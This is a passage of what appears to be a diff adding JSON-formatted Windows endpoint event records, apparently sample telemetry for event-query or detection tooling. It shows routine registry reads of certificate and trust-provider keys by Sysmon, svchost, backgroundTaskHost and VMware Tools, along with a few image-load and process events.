"C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState", + "registry_value": "LocalState", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\WINDOWS\\system32\\backgroundTaskHost.exe", + "registry_key": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog", + "registry_path": "\\REGISTRY\\A\\{0db9fc41-fdf8-ccf0-0c06-93660194a0d4}\\LocalState\\Common\\TaskWatchdog\\ContentDeliveryManager.Background.WatchdogTask", + "registry_value": "ContentDeliveryManager.Background.WatchdogTask", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.ApplicationModel.Background.TimeBroker.dll", + "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.TimeBroker.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691670000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{8bc39637-a766-42a2-9fda-9233ca603049}", + "registry_value": "{8bc39637-a766-42a2-9fda-9233ca603049}", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", + "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{9d5ff1f4-87b5-45eb-b329-50153c699baf}", + "registry_value": "{9d5ff1f4-87b5-45eb-b329-50153c699baf}", + "timestamp": 131883571692150000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883571692300000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "Windows.ApplicationModel.Background.SystemEventsBroker.dll", + "image_path": "C:\\Windows\\System32\\Windows.ApplicationModel.Background.SystemEventsBroker.dll", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "timestamp": 131883571691830000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "process", + "pid": 6376, + "process_name": "backgroundTaskHost.exe", + "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", + "subtype": "terminate", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_value": "HostActivityManager", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 780, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows NT\\CurrentVersion\\HostActivityManager\\Volatile", + "registry_value": "Volatile", + "timestamp": 131883571692460000, + "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883571749180000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "file", + "file_name": 